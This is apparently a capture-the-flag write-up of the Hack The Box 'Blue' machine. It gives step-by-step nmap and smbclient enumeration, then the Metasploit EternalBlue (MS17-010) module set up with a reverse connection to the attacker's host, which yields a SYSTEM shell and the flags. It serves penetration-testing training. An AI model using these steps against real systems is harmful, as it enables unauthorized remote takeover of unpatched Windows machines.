top of page

Blue


As usual let's start with nmap

nmap -sV -sC 10.129.238.166

nmap tells us that port 445 is open which is SMB so let's use this command to list the shares available:

smbclient -L 10.129.238.166
Note: SMB authentication always require a username. If you don't specify one, it will use your VM username as default. When prompted to enter a password, just press enter.

We have a few shares to look into. When prompted for a password just press enter.

smbclient \\\\10.129.238.166\\ADMIN$
smbclient \\\\10.129.238.166\\C$

We can't access ADMIN$ and C$


Let's keep going with the other shares:

smbclient \\\\10.129.238.166\\IPC$
smbclient \\\\10.129.238.166\\Share
smbclient \\\\10.129.238.166\\Users

We were able to access these 3 last shares but couldn't find anything interesting there.


Now let's do another nmap but this time looking for vulnerabilities in port 445 specifically by using this command:


nmap -p 445 --script vuln 10.129.238.166

-p ----> to specify a specific port (here port 445)


--script vuln ----> These scripts are looking for specific known vulnerabilities on the target machine


ok so we have a vulnerability called smb-vuln-ms17-010 Let's google it!

We found that ms17-010 is actually associated with the Eternal Blue vulnerability!

That explains why the target machine name is Blue!


We find the following :


"EternalBlue is an exploit that allows cyber threat actors to remotely execute arbitrary code and gain access to a network by sending specially crafted packets. It exploits a software vulnerability in Microsoft’s Windows operating systems (OS) Server Message Block (SMB) version 1 (SMBv1) protocol, a network file sharing protocol that allows access to files on a remote server. This exploit potentially allows cyber threat actors to compromise the entire network and all devices connected to it. Due to EternalBlue’s ability to compromise networks, if one device is infected by malware via EternalBlue, every device connected to the network is at risk. This makes recovery difficult, as all devices on a network may have to be taken offline for remediation. This vulnerability was patched and is listed on Microsoft’s security bulletin as MS17-010."

Now let's look for an exploit.


Let's open Metasploit:

msfconsole

Once Metasploit has opened, let's search for any exploit that contains the word blue by typing:

search blue

Let's check number 13 called exploit/windows/smb/ms17_010_eternalblue


use exploit/windows/smb/ms17_010_eternalblue 

show options

Looks like we only need to set RHOSTS (remote host) and LHOST (local host). RPORT is already set to 445 by default and LPORT is already set to 4444 by default.


set RHOSTS 10.129.238.166

Type the IP of the target machine

set LHOST 10.10.14.10

Type the IP of your local machine (if you don't know your IP, open a new prompt and type ifconfig)


Now that it's all set up, let's run the exploit:

exploit

It worked!


Now we can type:

shell

Let's find out the level of privileges we got:

whoami

ok we are nt authority\system so we have unrestricted privileges on the machine.


Let's change directory to find out the users

cd C:\Users

And now let's list the folders in this directory by typing:

dir

Looks like one of the user is haris. The user flag is usually located on the Desktop of the user so let's do:

cd haris/Desktop

then

dir

 type user.txt

Congratulations! You got the user flag!


Now let's go get the root flag. The root flag is usually located at C:\Users\Administrator\Desktop so :

cd C:\Users\Administrator\Desktop

dir

type root.txt

Congratulations! You got the root flag!

373 views0 comments

Recent Posts

See All

Previse

Backdoor

Lame

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page